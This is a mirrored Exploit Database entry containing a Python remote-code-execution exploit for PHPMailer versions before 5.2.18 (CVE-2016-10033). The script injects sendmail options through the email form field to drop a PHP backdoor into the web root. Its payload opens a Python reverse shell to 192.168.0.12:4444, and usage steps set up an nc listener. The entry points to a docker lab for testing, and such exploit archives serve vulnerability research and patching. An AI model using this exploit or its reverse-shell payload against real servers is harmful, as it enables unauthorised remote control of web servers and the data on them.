PHPMailer < 5.2.18 - Remote Code Execution

• Exploit Database
• 32 阅读

• 作者： anarc0der
  日期： 2016-12-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40974/

• """
  # Exploit Title: PHPMailer Exploit v1.0
  # Date: 29/12/2016
  # Exploit Author: Daniel aka anarc0der
  # Version: PHPMailer < 5.2.18
  # Tested on: Arch Linux
  # CVE : CVE 2016-10033
  
  Description:
  Exploiting PHPMail with back connection (reverse shell) from the target
  
  Usage:
  1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
  2 - Config your IP for reverse shell on payload variable
  4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
  3 - Open other terminal and run the exploit: python3 anarcoder.py
  
  Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
  
  Full Advisory:
  https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
  """
  
  from requests_toolbelt import MultipartEncoder
  import requests
  import os
  import base64
  from lxml import html as lh
  
  os.system('clear')
  print("\n")
  print(" █████╗ ███╗ ██╗ █████╗ ██████╗██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
  print("██╔══██╗████╗██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
  print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║██║█████╗██████╔╝")
  print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║██║██╔══╝██╔══██╗")
  print("██║██║██║ ╚████║██║██║██║██║╚██████╗╚██████╔╝██████╔╝███████╗██║██║")
  print("╚═╝╚═╝╚═╝╚═══╝╚═╝╚═╝╚═╝╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝╚═╝")
  print("PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
  print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
  
  target = 'http://localhost:8080'
  backdoor = '/backdoor.php'
  
  payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
  fields={'action': 'submit',
  'name': payload,
  'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
  'message': 'Pwned'}
  
  m = MultipartEncoder(fields=fields,
   boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
  
  headers={'User-Agent': 'curl/7.47.0',
   'Content-Type': m.content_type}
  
  proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
  
  
  print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
  r = requests.post(target, data=m.to_string(),
  headers=headers)
  print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
  r = requests.get(target+backdoor, headers=headers)
  if r.status_code == 200:
  print('[+]ExPLoITeD ' + target)